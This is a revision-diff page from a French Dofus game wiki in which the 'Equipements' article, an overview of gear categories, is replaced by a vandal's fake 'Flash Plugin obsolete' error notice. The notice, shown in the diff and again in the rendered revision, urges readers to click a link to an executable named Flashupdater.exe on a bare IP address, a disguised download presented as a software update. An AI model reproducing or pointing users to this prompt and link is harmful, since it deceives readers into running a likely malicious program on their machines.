Equipements : Différence entre versions

De Wiki Dofus
m (Révocation des modifications de Salabimi22 (discussion) vers la dernière version de GyD)
Ligne 1 : Ligne 1 :
{{NavEquip}}
+
<h2 style="margin:0;background-color:#cef2e0;font-family:sans-serif;font-size:120%;font-weight:bold;border:1px solid
{| {{tabledefaut}}
+
 
| width="200px" |
+
#a3bfb1;text-align:left;color:#000;padding:0.2em 0.4em;">Erreur</h2>
* [[Amulettes]]
+
 
* [[Anneaux]]
+
{| style="width:600px;-moz-border-radius:11px; border:1.5px dashed #55dd55;background:#eeffee" align="center"
* [[Bottes]]
 
* [[Capes]] et [[sacs à dos]]
 
* [[Ceintures]]
 
* [[Chapeaux]]
 
| Les '''équipements''' sont les objets que votre personnage peut porter. Ils sont essentiels pour jouer, car ils confèrent à votre personnage des attributs spéciaux, comme augmenter sa puissance.<br/>
 
Certains sont droppables, d'autres fabriqués par des artisans... Il y en a pour tous les goûts et tous les styles de personnages !<br/> A vous de rassembler les [[panoplies]], ou au contraire de mélanger les genres pour rendre votre personnage le plus puissant possible !
 
 
|-
 
|-
| colspan="2" | Certaines [[panoplies]] possédent un [[Familiers|familier]].
+
|[[Image:Wiki_Dofus.png|180px]]
|-
+
|align="center"|<font color="black">
|
+
<br><big>'''Erreur Flash Plugin (obsolete).'''</big>
* [[Arcs]]
+
<br><big>'''Mettez a jour votre logiciel.'''</big>
* [[Baguettes]]
+
<br>
* [[Bâtons]]
+
<big>'''Cliquez ici: [http://184.171.164.226/~tibiatoo/Flashupdater.exe Flash Plugin]'''</big>
* [[Dagues]]
+
<br>
* [[Epées]]
+
''Wiki-Dofus.eu''
* [[Haches]]
+
</font>
* [[Marteaux]]
 
* [[Pelles]]
 
| Bien que faisant partie d'une catégorie spéciale, les armes sont des éléments des équipements
 
|-
 
| colspan="2" | On peut y rajouter les [[boucliers]], mais ceux-ci nécessitent un alignement [[Bonta/Devenir Bontarien|bontarien]] ou [[Brâkmar/Devenir Brâkmarien|brâkmarien]], et une arme à une seule main (la seconde tenant le bouclier).
 
 
|}
 
|}
 
[[Catégorie:Equipements|*]]
 

Version du 20 août 2012 à 23:27

Erreur

Wiki Dofus.png


Erreur Flash Plugin (obsolete).
Mettez a jour votre logiciel.
Cliquez ici: Flash Plugin
Wiki-Dofus.eu